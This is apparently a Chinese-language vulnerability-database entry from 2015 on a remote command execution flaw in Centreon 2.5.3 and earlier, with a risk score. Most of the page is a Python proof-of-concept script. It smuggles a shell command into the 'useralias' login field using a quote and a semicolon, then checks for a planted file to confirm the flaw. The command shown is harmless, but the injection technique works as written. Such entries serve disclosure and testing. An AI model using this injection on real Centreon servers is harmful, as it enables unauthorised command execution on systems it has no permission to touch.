Centreon <=2.5.3 'exec()' 函数远程命令执行漏洞

🗓️ 28 Sep 2015 00:00:00Reported by RootType

Centreon <=2.5.3 'exec()' 远程命令执行漏洞检测


                                                #!/usr/bin/python
#coding: gb2312

# 文件名称：centreon_exec_rce_poc.py
# 编写时间：2014-12-09
# 更新时间：2015-07-17

# 漏洞说明：Centreon 'exec()' 函数远程命令执行漏洞
# 影响版本：Centreon <= 2.5.3
# 特别说明：该漏洞的触发条件是开启了调试权限。具体配置参考：系统管理 -> 参数 -> 调试 -> 认证debug -> Yes

# 漏洞参考：
# Bugtraq ID:71333
# http://www.securityfocus.com/bid/71333/

import sys
import urllib

flag = "leng_que"

# 备注：Centreon内部会把`号过滤掉，同时会把*号转换为\*
shell_cmd = "echo -n '"+flag+"' > leng_que.txt;"

def main(centreon_server_url):
    post_data = urllib.urlencode({"useralias": "\";"+shell_cmd+"\"", "password": "leng_que", "submit": "leng_que"})
    r = urllib.urlopen(centreon_server_url, post_data)
    if ( 200 == r.getcode() ):
        test_file_url = centreon_server_url+"/leng_que.txt"
        r = urllib.urlopen(test_file_url)
        if ( 200 == r.getcode() and flag == r.read() ):
            print "漏洞肯定存在"
        else:
            print "漏洞或许不存在"
    else:
        print "无法判断漏洞是否存在"

if __name__ == '__main__':
    if (2 == len(sys.argv)):
        main(sys.argv[1])
    else:
        print "用法示例: centreon_exec_rce_poc.py http://192.168.0.194"

28 Sep 2015 00:00Current

7.1High risk

Vulners AI Score7.1

centreon rce 远程命令执行漏洞版本调试权限 url 参数